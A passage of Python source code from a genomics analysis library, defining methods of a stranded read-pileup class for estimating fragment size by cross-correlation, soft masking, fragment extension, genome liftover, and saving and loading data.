# print '\tA: {:>.2} C: {:>.2} G: {:>.2} T: {:>.2}'.format(*list(background_model))
#
# print '\tGenerating background-aware log PWM...'
# pfm = motifs.load_PFM_horizontal(jaspar_filename)
# pwm = motifs.pfm_to_pwm_log(pfm, background_model=background_model, pseudo_count=0.01)
# score_offset = int(pwm.shape[1] / 2) # find the midpoint position of the motif
#
# print '\tScanning genome with PWM ...'
# for chrom in sorted(self.spileups):
# _print('Chrom: {}'.format(chrom), 2)
# for strand in self.spileups[chrom]:
# _print('Strand: {}'.format(strand), 3)
# if strand == 1:
# self.spileups[chrom][strand] = motifs.scan_pwm(seq=sequence_dict[chrom], pwm=pwm,
# score_offset=score_offset)
# else:
# self.spileups[chrom][strand] = motifs.scan_pwm(seq=toolbox.rev_complement(sequence_dict[chrom]),
# pwm=pwm, score_offset=score_offset)[::-1]
# print 'Done in {}'.format(datetime.datetime.now() - start_time)
#
def computeCoverage(self):
self.coverage = self.total_read_length / float(self.genome_size)
def getFragmentSize(self, replicate_name, fragment_size_search_start=100, fragment_size_search_end=1000,
save_plot_fname='', derivative_smoothing_factor=10):
fragment_length = get_fragment_size_from_file(replicate_name)
if not fragment_length:
fragment_length = self.estimateFragmentSize(fragment_size_search_start, fragment_size_search_end,
save_plot_fname=save_plot_fname,
derivative_smoothing_factor=derivative_smoothing_factor,
force_split=self.build in ('monDom5',))
save_fragment_length(replicate_name, fragment_length)
self.fragment_size = fragment_length
return fragment_length
def estimateFragmentSize(self, fragment_size_search_start=50, fragment_size_search_end=500, save_plot_fname='',
derivative_smoothing_factor=10, mem_map_inputs=False,
force_split=False):
"""
Computes the optimal distance to shift each strand toward each other in order to maximize the cross-correlation
of the two strands.
:param fragment_size_search_start:
:param fragment_size_search_end:
:param save_plot_fname:
:return:
"""
start_time = datetime.datetime.now()
multi_processing_method = MULTI_PROCESSING_METHOD
print('Estimating fragment size by by cross-correlation of positive and negative strands...')
total_cc = numpy.zeros(fragment_size_search_end - fragment_size_search_start)
total_cc_counter = numpy.zeros(len(
total_cc)) # track the number of contributing chromosomes at each position in the vector so later we can take the mean
print('Generating list of chromosomes to process...')
param_list = []
for chrom in sorted(list(self.spileups.keys()), key=lambda x: len(self.spileups[x][-1]), reverse=True):
# divide each chromosome into roughly-evenly-sized chunks as needed to get around the maximum parameter
# size limitation of the multiprocessing module.
num_chunks_needed = int(math.ceil(len(self.spileups[chrom][1]) / float(MAX_MESSAGE_SIZE / 2)))
if multi_processing_method == 'pool' or multi_processing_method == 'hybrid' or force_split:
dbg_print(
'\tSplitting chromosome {} of size {} into {} chunks...'.format(chrom, len(self.spileups[chrom][1]),
num_chunks_needed))
else:
dbg_print('\tPreparing chromosome {} of size {}...'.format(chrom, len(self.spileups[chrom][1])))
# Note that if the fftconvolve method is later called with mode='same', it is the second argument whose sequence
# should be reversed otherwise the size and midpoint calculations are thrown off.
if (
multi_processing_method == 'pool' or multi_processing_method == 'hybrid' or force_split) and num_chunks_needed > 1:
neg_strand_chunks = toolbox.flexible_split(self.spileups[chrom][-1],
num_chunks_needed)
pos_strand_chunks = toolbox.flexible_split(self.spileups[chrom][1],
num_chunks_needed)
else:
neg_strand_chunks = [self.spileups[chrom][-1]]
pos_strand_chunks = [self.spileups[chrom][1]]
mem_mapped_file_counter = 0
for chunk_idx in range(len(neg_strand_chunks)):
if mem_map_inputs and mem_mapped_file_counter < MAX_FILEHANDLES_PER_PILEUP:
neg_chunk = toolbox.replace_with_mem_map(neg_strand_chunks[chunk_idx], tmp_dir=LOCAL_TMP_DIR)
pos_chunk = toolbox.replace_with_mem_map(pos_strand_chunks[chunk_idx], tmp_dir=LOCAL_TMP_DIR)
mem_mapped_file_counter += 2
else:
neg_chunk = neg_strand_chunks[chunk_idx]
pos_chunk = pos_strand_chunks[chunk_idx]
param_list.append((chrom, chunk_idx, (neg_chunk, pos_chunk)))
del neg_chunk
del pos_chunk
del neg_strand_chunks
del pos_strand_chunks
dbg_print('Sorting chunks in descending order of size...')
param_list.sort(key=lambda x: len(x[2][-1]), reverse=True)
if multi_processing_method == 'antfarm':
print(('Spawning up to {} sub-processes (using AntFarm) to process {} chromosomes in {} chunks'.format(
THREADS,
len(self.spileups),
len(param_list))))
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
for paramset in param_list:
job_dict['{}_{}'.format(paramset[0], paramset[1])] = {'inputs': (paramset[2][0], paramset[2][1]),
'num_outputs': 1,
'params': (paramset[0], paramset[1])}
del param_list
cross_correlate_farm = antfarm.AntFarm(slave_script=toolbox.home_path(
'workspace/expression_modeling/model/pileup_cross_correlate_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = cross_correlate_farm.execute()
del job_dict
# print 'results:{}'.format(results)
for job_name in results:
cc = results[job_name][0]
# print '\t{} {}'.format(job_name, len(cc))
midpoint = len(cc) / 2
cc_end = min(midpoint + (fragment_size_search_end - fragment_size_search_start), len(cc))
total_cc_end = cc_end - midpoint
# print 'midpoint {}, cc_end {}, total_cc_end {}'.format(midpoint, cc_end, total_cc_end)
# print 'len cc {} len total_cc {}'.format(len(cc), len(total_cc))
total_cc[:total_cc_end] += cc[midpoint:cc_end]
total_cc_counter[:total_cc_end] += 1
elif multi_processing_method == 'pool' or multi_processing_method == 'hybrid' or multi_processing_method == 'none':
if multi_processing_method == 'pool':
print((
'Spawning up to {} sub-processes (using multiprocessing.Pool) to cross-correlate {} chromosomes in {} chunks'.format(
THREADS,
len(self.spileups),
len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(cross_correlate_chromslave, param_list)
elif multi_processing_method == 'none':
print(('Processing {} chromosomes in {} chunks with a single process...'.format(len(self.spileups),
len(param_list))))
results = list(map(cross_correlate_chromslave, param_list))
del param_list
for chrom, chunk_idx, cc in results:
midpoint = len(cc) / 2
cc_end = min(midpoint + (fragment_size_search_end - fragment_size_search_start), len(cc))
total_cc_end = cc_end - midpoint
total_cc[:total_cc_end] += cc[midpoint:cc_end]
total_cc_counter[:total_cc_end] += 1
else:
raise ValueError(
'Received invalid value {} for parameter <multi_processing_method> in StrandedPileups.estimateFragmentSize()'.format(
multi_processing_method))
# remove zero positions and take the mean of all contributions to each locus
total_cc_nz = numpy.nonzero(total_cc_counter)
total_cc = total_cc[total_cc_nz] / total_cc_counter[total_cc_nz]
print(('Looking for cross-correlation peaks from {} to {} bp'.format(fragment_size_search_start,
fragment_size_search_end)))
print('\tCalculating first derivative by finite difference...')
der1 = toolbox.finite_difference(total_cc)
print('\tSmoothing derivative...')
smoothed_der1 = scipy.ndimage.gaussian_filter1d(der1, derivative_smoothing_factor)
print('\tFinding downward 0-crossings...')
crossings = [c + fragment_size_search_start + 1 for c in
toolbox.find_0_crossings(smoothed_der1, 1, rising_falling='falling')]
print(('\tCandidate fragment lengths: {}'.format(', '.join([str(c) for c in crossings]))))
fragment_size = crossings[0]
# full_shift = crossings[0] + strand_shift_window_start
# full_shift = numpy.argmax(total_cc) + strand_shift_window_start
half_shift = int(fragment_size / 2)
print(('Estimated fragment size: {}, strand shift: {}'.format(fragment_size, half_shift)))
if save_plot_fname:
print(('Saving cross-correlation plot as {}'.format(save_plot_fname)))
# print '\tshape of cross-correlation vector: {}'.format(total_cc.shape)
myplots.plot_cc(start=fragment_size_search_start,
signal=total_cc[:min(fragment_size_search_end, len(total_cc))], peak_locations=crossings,
fname=save_plot_fname)
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
return fragment_size
def readStartsToSoftMask(self, read_length, fragment_length):
"""
Assuming this object contains read start sites, return a soft mask whereby each strand consists of
the proportion of putative fragment starts (within <fragment_length> upstream) are alignable.
Note: this flavor of soft masking is designed for the fragment extension method. Soft masking with read shifting
is currently not supported.
Since this object is assumed to contain only the start sites of positive-strand fragments, we will need to shift
everything over by <read_length> in order to simulate the ends of negative-strand fragments.
<multi_processing_method> defines which approach to multi-processing to use:
"antfarm": use the AntFarm paradigm
"pool": use multiprocessing.Pool
"none": only use a single process -- no multi-processing
"""
start_time = datetime.datetime.now()
multi_processing_method = MULTI_PROCESSING_METHOD
new_pileups = self.emptyCopy()
new_pileups.name = self.name + '_extended_to_{}_bp'.format(fragment_length)
print((
'Generating double-stranded soft mask from vector of positive-strand read start sites using fragment length {} and read length {}...'.format(
fragment_length, read_length)))
param_list = [(chrom, self.spileups[chrom][1], read_length, fragment_length) for chrom in
sorted(list(self.spileups.keys()), key=lambda x: self.chrom_lengths[x],
reverse=True)] # process largest chromosomes first
if multi_processing_method == 'hybrid':
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
new_param_list = []
for paramset in param_list:
if len(paramset[1]) > MAX_MESSAGE_SIZE:
job_dict[paramset[0]] = {'inputs': [paramset[1]], 'num_outputs': 2,
'params': [paramset[2], paramset[3]]}
else:
new_param_list.append(paramset)
param_list = new_param_list
elif multi_processing_method == 'antfarm':
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
for paramset in param_list:
job_dict[paramset[0]] = {'inputs': [paramset[1]], 'num_outputs': 2,
'params': [paramset[2], paramset[3]]}
if multi_processing_method == 'antfarm' or multi_processing_method == 'hybrid':
print('Spawning up to {} subprocesses (using AntFarm) to soft mask {} chromosomes...'.format(THREADS, len(
job_dict)))
soft_mask_farm = antfarm.AntFarm(
slave_script=toolbox.home_path('workspace/expression_modeling/model/pileup_soft_mask_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = soft_mask_farm.execute()
for chrom in results:
new_pileups.spileups[chrom] = {-1: results[chrom][0].astype(self.pileup_dtype),
1: results[chrom][1].astype(self.pileup_dtype)}
if multi_processing_method == 'pool' or multi_processing_method == 'none' or multi_processing_method == 'hybrid':
if multi_processing_method == 'pool' or multi_processing_method == 'hybrid':
print(
('Spawning up to {} subprocesses (using multiprocessing.Pool) to process {} chromosomes...'.format(
THREADS, len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(soft_mask_generate_chromslave, param_list)
elif multi_processing_method == 'none':
print(('Processing {} chromosomes with a single process...'.format(len(self.spileups))))
results = list(map(soft_mask_generate_chromslave, param_list))
for chrom, soft_mask in results:
new_pileups.spileups[chrom] = {-1: soft_mask[0], 1: soft_mask[1]}
print('Done converting read starts to soft mask in {}'.format(datetime.datetime.now() - start_time))
return new_pileups
def applySoftMask(self, soft_mask):
"""
Just divides the contents by the values in <soft_mask>, ignoring positions with a 0 value in <soft_mask>
"""
start_time = datetime.datetime.now()
print(('Applying soft mask {} to {}'.format(soft_mask.name, self.name)))
for chrom in sorted(self.spileups, key=lambda x: self.chrom_lengths[x], reverse=True):
dbg_print('Processing chromosome {}...'.format(chrom), 1)
for strand in self.spileups[chrom]:
if numpy.abs(self.spileups[chrom][strand]).sum() > 0:
maskable_strand = numpy.ma.array(
self.spileups[chrom][strand].astype(numpy.float64)) # prevent divide by 0 (divide by 0 -> 0)
maskable_strand /= soft_mask.spileups[chrom][strand].astype(numpy.float64)
self.spileups[chrom][strand] = maskable_strand.filled(0).astype(self.pileup_dtype)
else:
dbg_print('\tChromosome {}, strand {} was empty so not processed.'.format(chrom, strand))
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
def fragExtend(self, fragment_length):
"""
Assuming contents represent counts of read start sites, extend each start site by <extend> bp downstream on each strand.
:param extend:
:return:
"""
multi_processing_method = MULTI_PROCESSING_METHOD
new_pileups = self.emptyCopy()
new_pileups.name = '{}_extended_to_{}bp'.format(self.name, fragment_length)
start_time = datetime.datetime.now()
print(('Extending read start sites in {} by {} bp...'.format(self.name, fragment_length - 1)))
param_list = [(chrom, (self.spileups[chrom][-1], self.spileups[chrom][1]), fragment_length) for chrom in
# note extension is fragment size -1 since we already have the start site
sorted(list(self.spileups.keys()), key=lambda x: self.chrom_lengths[x], reverse=True)]
if multi_processing_method == 'hybrid':
# convert parameter list to job dictionary to feed to AntFarm consisting only of chromosomes too large
# to use in Pool
job_dict = collections.OrderedDict()
new_param_list = []
for paramset in param_list:
if len(paramset[1][0]) > MAX_MESSAGE_SIZE:
job_dict[paramset[0]] = {'inputs': [paramset[1][0], paramset[1][1]], 'num_outputs': 2,
'params': [paramset[2]]}
else:
new_param_list.append(paramset)
param_list = new_param_list
elif multi_processing_method == 'antfarm':
# convert parameter list to job dictionary to feed to AntFarm
job_dict = collections.OrderedDict()
for paramset in param_list:
job_dict[paramset[0]] = {'inputs': [paramset[1][0], paramset[1][1]], 'num_outputs': 2,
'params': [paramset[2]]}
del param_list
if multi_processing_method == 'antfarm' or multi_processing_method == 'hybrid':
print(('Spawning up to {} subprocesses (using AntFarm) to process {} chromosomes...'.format(THREADS, len(
job_dict))))
frag_extend_farm = antfarm.AntFarm(
slave_script=toolbox.home_path('workspace/expression_modeling/model/pileup_frag_extend_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = frag_extend_farm.execute()
del job_dict
for chrom in results:
new_pileups.spileups[chrom] = {-1: results[chrom][0].astype(self.pileup_dtype),
1: results[chrom][1].astype(self.pileup_dtype)}
if multi_processing_method == 'pool' or multi_processing_method == 'none' or multi_processing_method == 'hybrid':
if multi_processing_method == 'pool' or multi_processing_method == 'hybrid':
print(
('Spawning up to {} subprocesses (using multiprocessing.Pool) to process {} chromosomes...'.format(
THREADS, len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(frag_extend_chromslave, param_list)
elif multi_processing_method == 'none':
print(('Processing {} chromosomes with a single process...'.format(len(self.spileups))))
results = list(map(frag_extend_chromslave, param_list))
for chrom, extended_fragments in results:
new_pileups.spileups[chrom] = {-1: extended_fragments[0], 1: extended_fragments[1]}
# else:
# raise ValueError(
# 'Received invalid value {} for parameter <multi_processing_method> in StrandedPileups.fragExtend()'.format(
# multi_processing_method))
print(('All done in {}.'.format(datetime.datetime.now() - start_time)))
return new_pileups
def liftoverWithChain(self, source_pileups, chain_basepath, chain_type='normal', destination_dtype=None):
"""
Uses <chain_file> to liftover the contents of <source_pileups> to itself.
Chain files are named <Reference>To<Query>
"""
start_time = datetime.datetime.now()
if not destination_dtype:
destination_dtype = self.pileup_dtype
header_fields = (
'dummy', 'score', 'tName', 'tSize', 'tStrand', 'tStart', 'tEnd', 'qName', 'qSize', 'qStrand', 'qStart',
'qEnd',
'id')
# generate chain filename
if chain_type == 'rbest': # use the reciprocal best chain (filtered to one-to-one AKA single coverage in both directions. See http://genomewiki.ucsc.edu/index.php/HowTo:_Syntenic_Net_or_Reciprocal_Best
chain_filename = os.path.join(chain_basepath,
'{}.{}.rbest.chain'.format(toolbox.first_lower(self.build),
toolbox.first_lower(source_pileups.build)))
else: # otherwise use normal chain file (single coverage only in target)
chain_filename = os.path.join(chain_basepath,
'{}To{}.over.chain'.format(toolbox.first_lower(self.build),
toolbox.first_upper(source_pileups.build)))
missing_chroms = set([])
print(('Lifting over from {} using chain file {}'.format(source_pileups.name, chain_filename)))
with open(chain_filename, 'rt') as chain_file:
self._initialize(pileup_dtype=destination_dtype)
new_chain = True
good_chain = False
for line_num, line in enumerate(chain_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Processing line {}'.format(line_num), 1)
# new chain
if new_chain and line != '\n': # insurance against multiple blank lines
header = toolbox.parse_line_dict(line, header_fields, split_char=' ', strict=True)
assert header['dummy'] == 'chain'
new_chain = False
# relative offsets within the chain
ref_chain_pos = 0
query_chain_pos = 0
ref_chrom = toolbox.convert_chroms(header['tName'], dest=source_pileups.chromosome_dialect)
query_chrom = toolbox.convert_chroms(header['qName'], dest=self.chromosome_dialect)
good_chain = False
if ref_chrom in self.pileups:
try:
assert int(header['tSize']) == len(self.pileups[ref_chrom])
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for reference chromosome {} does not match our size of {}'.format(
line_num, header['id'], header['tSize'], ref_chrom,
len(self.pileups[ref_chrom]))))
raise ae
else:
if query_chrom in source_pileups.pileups:
try:
assert int(header['qSize']) == len(source_pileups.pileups[query_chrom])
except AssertionError as ae:
print((
'Error on line {}, chain {}. Chain file size of {} for query chromosome {} does not match source size of {}'.format(
line_num, header['id'], header['qSize'], query_chrom,
len(self.pileups[query_chrom]))))
raise ae
else:
good_chain = True
else:
missing_chroms.add(ref_chrom)
ref_chain_start = int(header['tStart'])
query_chain_start = int(header['qStart'])
elif line == '\n':
# start a new chain on the next line
new_chain = True
elif good_chain:
# it must be a data line
split_line = line.split('\t')
size = int(split_line[0])
if len(split_line) == 3:
ref_diff = int(split_line[1])
query_diff = int(split_line[2])
elif len(split_line) == 1:
ref_diff = 0
query_diff = 0
else:
raise Exception(
'Encountered a chain alignment data line of length 2 on line {}. Unsure how to handle this so quitting...'.format(
line_num))
ref_start_pos = ref_chain_start + ref_chain_pos
ref_end_pos = ref_start_pos + size
ref_chain_pos += size + ref_diff
query_start_pos = query_chain_start + query_chain_pos
query_end_pos = query_start_pos + size
query_chain_pos += size + query_diff
for strand in (-1, 1):
self.spileups[ref_chrom][strand][ref_start_pos:ref_end_pos] = \
source_pileups.spileups[query_chrom][strand][
query_start_pos:query_end_pos]
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
if missing_chroms:
print(('The following chromosomes in the chain file were missing in the destination organism: {}'.format(
','.join(sorted(list(missing_chroms))))))
def liftoverWithMappingTable(self, destination_build, destination_chrom_lengths, mapping_table_filename):
"""
Use <mapping_table_filename> to liftover the pileup vectors in <self>
and return it as a new pileup object.
:return:
"""
CHROM_FIELD = 0
DESTINATION_FRAG_START = 4
DESTINATION_INSERTION = 5
DESTINATION_FRAG_END = 6
SOURCE_FRAG_START = 8
SOURCE_INSERTION = 9
SOURCE_FRAG_END = 10
with open(mapping_table_filename, 'rt') as mapping_table:
print(('Lifting over reads to {} using {}...'.format(destination_build, mapping_table_filename)))
lifted_pileups = StrandedPileups(chrom_lengths=destination_chrom_lengths, name=self.name,
build=destination_build,
chromosome_dialect='ensembl')
# lifted_pileups._initialize(0)
table_reader = csv.reader(mapping_table, dialect=csv.excel_tab)
for line_num, line in enumerate(table_reader):
# remember mapping table is 1-based
if line_num % 100000 == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if line[SOURCE_FRAG_START] != line[SOURCE_FRAG_END]:
# print line
chrom = toolbox.convert_chroms(line[CHROM_FIELD], dest=self.chromosome_dialect)
if chrom not in self.spileups:
# break
raise Exception('Found chromosome {} in mapping table but no record of it in {}.'.format(chrom,
self.build))
if chrom not in lifted_pileups.spileups:
# break
raise Exception('Found chromosome {} in mapping table but no record of it in {}.'.format(chrom,
destination_build))
dest_frag_start = int(line[DESTINATION_FRAG_START]) - 1
dest_frag_end = int(line[DESTINATION_FRAG_END]) + 1
source_frag_start = int(line[SOURCE_FRAG_START]) - 1
source_frag_end = int(line[SOURCE_FRAG_END]) + 1
if line[DESTINATION_INSERTION] == r'\N' and line[SOURCE_INSERTION] == r'\N':
if source_frag_end - source_frag_start != dest_frag_end - dest_frag_start:
raise Exception(
'Source ({} bp) and destination ({} bp) fragments not the same size on line {}'.format(
source_frag_end - source_frag_start, dest_frag_end - dest_frag_start, line_num))
else:
try:
for strand in (-1, 1):
lifted_pileups.spileups[chrom][strand][dest_frag_start:dest_frag_end] = \
self.spileups[chrom][strand][
source_frag_start:source_frag_end]
except ValueError as ve:
print((
'Despite checking for this, somehow unequal fragment sizes have slipped through on line {}. Source: {} {} {}, destination: {} {} {}'.format(
line_num, source_frag_start, source_frag_end, source_frag_end - source_frag_start,
dest_frag_start, dest_frag_end, dest_frag_end - dest_frag_start)))
print(('chrom: {}'.format(chrom)))
print(('source chromosome size: {}'.format(self.spileups[chrom][1].shape)))
print(
('destination chromosome size: {}'.format(lifted_pileups.spileups[chrom][1].shape)))
raise ve
return lifted_pileups
def mixDown(self, strand_shift=0, extend=0):
"""
Convert to a standard (unstranded) pileup object using a specified <strand_shift> corresponding
to half the fragment size.
If <extend> is non-zero, extend each the signal in the 3' direction by the given amount
Currently do not support combining <strand_shift> and <extend>
"""
if strand_shift and extend:
raise Exception(
'Using <strand shift> and <extend> at the same time currently not supported (\"Why would you have the stereo and the T.V. on at the same time?\")')
start_time = datetime.datetime.now()
if extend:
print(('Mixing down stranded pileups {} to unstranded using fragment extension of {} bp'.format(self.name,
extend)))
else:
print(('Mixing down stranded pileups {} to unstranded using strand shift of {} bp'.format(self.name,
strand_shift)))
new_pileups = self.singleStrandedEmptyCopy()
for chrom in sorted(self.chrom_lengths, key=lambda x: self.chrom_lengths[x], reverse=True):
new_pileups.pileups[chrom] = numpy.zeros(self.chrom_lengths[chrom], dtype=numpy.float64)
dbg_print('Processing chromosome {}...'.format(chrom), 1)
if numpy.sum(numpy.abs(self.spileups[chrom][-1])) + numpy.sum(numpy.abs(self.spileups[chrom][1])) == 0:
dbg_print('No data in chromosome {}, skipping...'.format(chrom), 1)
else:
for strand in self.spileups[chrom]:
# print '\tStrand: {}'.format(strand)
current_strand = self.spileups[chrom][strand].astype(numpy.float64)
if extend:
new_pileups.pileups[chrom] += current_strand
for i in range(1, extend + 1):
# print '\t\tExtension: {}'.format(i)
if strand == 1:
new_pileups.pileups[chrom][i:] += current_strand[:-i]
else:
new_pileups.pileups[chrom][:-i] += current_strand[i:]
else:
effective_strand_shift = strand * strand_shift
# print 'strand: {}, effective shift: {}'.format(strand, effective_strand_shift)
if effective_strand_shift > 0:
new_pileups.pileups[chrom][effective_strand_shift:] += current_strand[
:-effective_strand_shift]
elif effective_strand_shift < 0:
new_pileups.pileups[chrom][:effective_strand_shift] += current_strand[
- effective_strand_shift:]
else:
new_pileups.pileups[chrom] += current_strand
new_pileups.toType(new_pileups.pileup_dtype)
print(('Done in {}'.format(datetime.datetime.now() - start_time)))
# print 'current chromosomes: {}'.format(new_pileups.pileups.keys())
return new_pileups
def combineStrands(self, binary_func):
"""
Return a new single-stranded pileup resulting from the application of <binary_func> to both strands of self.
:param binary_func:
:return:
"""
output = self.singleStrandedEmptyCopy()
for chrom in self.spileups:
output.pileups[chrom] = binary_func(self.spileups[chrom][-1], self.spileups[chrom][1])
return output
def bindingEnergyToProbability(self, mu, nans_to_zeros=True, pileup_dtype=PILEUP_DTYPE):
"""
Assumes we contain stranded binding energy data. Returns a stranded pileup of binding probabilities for each strand
given the energies and concentration parameter mu. NaNs will have a probability of 0.
:return:
"""
print('Converting binding energy to probabilities...')
if nans_to_zeros:
print('NaNs -> zero probability')
else:
print('NaNs will be retained')
binding_probs = self.emptyCopy()
self.name += '_binding_probability'
binding_probs.spileups = {}
for chrom in self.spileups:
binding_probs.spileups[chrom] = {}
for strand in self.spileups[chrom]:
binding_probs.spileups[chrom][strand] = motifs.binding_probabilities(
self.spileups[chrom][strand].astype(numpy.float64), mu)
if nans_to_zeros:
binding_probs.spileups[chrom][strand] = numpy.nan_to_num(binding_probs.spileups[chrom][strand])
if pileup_dtype != type(binding_probs.spileups[chrom][strand]):
binding_probs.spileups[chrom][strand] = binding_probs.spileups[chrom][strand].astype(pileup_dtype)
return binding_probs
def copy(self, dtype=numpy.float64):
"""
Alias for deepCopy()
:param dtype:
:return:
"""
return self.deepCopy()
def deepCopy(self, dtype=numpy.float64):
"""
Returns a new pileups object containing the same data (a deep copy) with an optional change of datatype.
:param other:
:return:
"""
new_pu = self.emptyCopy()
for chrom in self.spileups:
new_pu.spileups[chrom] = {}
for strand in self.spileups[chrom]:
new_pu.spileups[chrom][strand] = self.spileups[chrom][strand].astype(dtype)
return new_pu
def shallowCopy(self):
new_pu = self.emptyCopy()
for chrom in self.spileups:
new_pu.spileups[chrom] = {}
for strand in self.spileups[chrom]:
new_pu.spileups[chrom][strand] = self.spileups[chrom][strand]
return new_pu
def emptyCopy(self):
"""
Returns a new pileups object containing the same meta-data but with no pileups data
:return:
"""
new_pu = StrandedPileups(self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pu.spileups = {}
new_pu.is_normalized = self.is_normalized
# new_pu.genome_size = self.genome_size
new_pu.coverage = self.coverage
new_pu.total_reads = self.total_reads
new_pu.mean_read_length = self.mean_read_length
new_pu.mode_read_length = self.mode_read_length
new_pu.pileup_dtype = self.pileup_dtype
new_pu.fragment_size = self.fragment_size
return new_pu
def singleStrandedEmptyCopy(self):
"""
Returns a new single-stranded Pileups object containing the same meta-data and no data
:return:
"""
new_pileups = Pileups(chrom_lengths=self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pileups.input_filename = self.input_filename
new_pileups.coverage = self.coverage
new_pileups.total_reads = self.total_reads
new_pileups.is_normalized = False
new_pileups.total_read_length = self.total_read_length
new_pileups.mean_read_length = self.mean_read_length
new_pileups.mode_read_length = self.mode_read_length
new_pileups.pileup_dtype = self.pileup_dtype
new_pileups.fragment_size = self.fragment_size
new_pileups.pileups = {}
return new_pileups
def save(self, folder_path, gzipped=True):
print('Saving stranded pileup data to {} ...'.format(folder_path))
toolbox.establish_path(folder_path)
for chrom in toolbox.numerical_string_sort(self.chrom_lengths):
for strand in self.spileups[chrom]:
print('\tSaving chromosome {} strand {}'.format(chrom, strand))
if gzipped:
with gzip.open(os.path.join(folder_path, '{}_{}.npy.gz'.format(chrom, strand)),
'wb') as strand_file:
numpy.save(strand_file, self.spileups[chrom][strand])
else:
numpy.save(os.path.join(folder_path, '{}_{}.npy'.format(chrom, strand)),
self.spileups[chrom][strand])
with open(os.path.join(folder_path, 'meta_data.txt'), 'w') as out_file:
META_DATA_VARS = (self.name, self.build, self.chromosome_dialect, self.is_normalized)
out_file.write(','.join(str(v) for v in META_DATA_VARS))
@classmethod
def load(cls, folder_path, mmap_mode=''):
overall_load_start_time = datetime.datetime.now()
loaded_pileup = cls()
print('Loading pileup data from {} ...'.format(folder_path))
if mmap_mode:
print(
'Loading up to {} chromosomes in mem-mapped mode {} ...'.format(MAX_FILEHANDLES_PER_PILEUP, mmap_mode))
with open(os.path.join(folder_path, 'meta_data.txt'), 'rt') as meta_data_file:
meta_data = meta_data_file.read().strip().split(',')
loaded_pileup.name = str(meta_data[0])
loaded_pileup.build = str(meta_data[1])
loaded_pileup.chromosome_dialect = str(meta_data[2])
loaded_pileup.is_normalized = {'True': True, 'False': False}[meta_data[3]]
mem_mapped_chrom_count = 0
# sort the chromosomes in order of descending size (so that we mem-map the biggest first)
# array_fnames = sorted(os.listdir(folder_path), reverse=True, key=lambda x: loaded_pileup.chrom_lengths[toolbox.parse_path(x)[1].split('_')[0]])
for array_fname in toolbox.numerical_string_sort(os.listdir(folder_path)):
if array_fname.endswith('.npy'):
start_time = datetime.datetime.now()
chrom, strand = toolbox.parse_path(array_fname)[1].split('_')
strand = int(strand)
if chrom not in loaded_pileup.spileups:
loaded_pileup.spileups[chrom] = {}
if mmap_mode and mem_mapped_chrom_count < MAX_FILEHANDLES_PER_PILEUP:
print('\tLoading chromosome {} strand {} mem-mapped ...'.format(chrom, strand))
loaded_pileup.spileups[chrom][strand] = numpy.load(os.path.join(folder_path, array_fname),
mmap_mode=mmap_mode)
mem_mapped_chrom_count += 1
else:
print('\tLoading chromosome {} strand {} ...'.format(chrom, strand))
loaded_pileup.spileups[chrom][strand] = numpy.load(os.path.join(folder_path, array_fname))
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.spileups[chrom][strand])
elif array_fname.endswith('.npy.gz'):
start_time = datetime.datetime.now()
chrom, strand = array_fname.split('.')[0].split('_')
strand = int(strand)
if chrom not in loaded_pileup.spileups:
loaded_pileup.spileups[chrom] = {}
print('\tLoading chromosome {} strand {} ...'.format(chrom, strand))
with gzip.open(os.path.join(folder_path, array_fname), 'rb') as strand_file:
loaded_pileup.spileups[chrom][strand] = numpy.load(strand_file)
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.spileups[chrom][strand])
print('\tDone loading in {}'.format(datetime.datetime.now() - start_time))
loaded_pileup.pileup_dtype = list(list(loaded_pileup.spileups.values())[0].values())[0].dtype
# loaded_pileup.genome_size = sum(loaded_pileup.chrom_lengths.values())
print('Done loading {} from files in {}'.format(loaded_pileup.name, datetime.datetime.now() - overall_load_start_time))
def flatten(self):
"""
Returns a flat vector consisting of the negative strands of all chromosomes concatenated in alpha order followed
by the positive strands concatenated in alpha chromosome order
:return:
"""
flat_vector = numpy.zeros(
sum([len(s[-1]) for s in list(self.spileups.values())]) + sum(
[len(s[1]) for s in list(self.spileups.values())]))
offset = 0
for strand in (-1, 1):
for chrom in self.spileups:
l = len(self.spileups[chrom][strand])
flat_vector[offset:offset + l] = self.spileups[chrom][strand]
offset += l
return flat_vector
def trimChromosomes(self, chromosomes_to_include=None, chromosomes_to_exclude=None):
if not chromosomes_to_include:
new_chromosomes = set(self.pileups.keys())
new_chromosomes = new_chromosomes.difference_update(set(chromosomes_to_exclude))
print('Trimming chromosomes to only include: {}'.format(', '.join(new_chromosomes)))
for chrom in self.spileups:
if chrom not in new_chromosomes:
del self.spileups[chrom]
for chrom in self.chrom_lengths:
if chrom not in new_chromosomes:
del self.chrom_lengths[chrom]
def apply(self, func):
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = func(self.spileups[chrom][strand])
def clip(self, min_value=0, max_value=1):
"""
Constrains the pileup vectors to be bewtween :param:`min_value` and :param:`max_value`
by applying the numpy.clip function.
"""
print('Clipping pileup values to be between {} and {}'.format(min_value, max_value))
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = numpy.clip(self.spileups[chrom][strand], a_min=min_value, a_max=max_value)
def smooth(self, gaussian_kernel_bandwidth=45):
"""
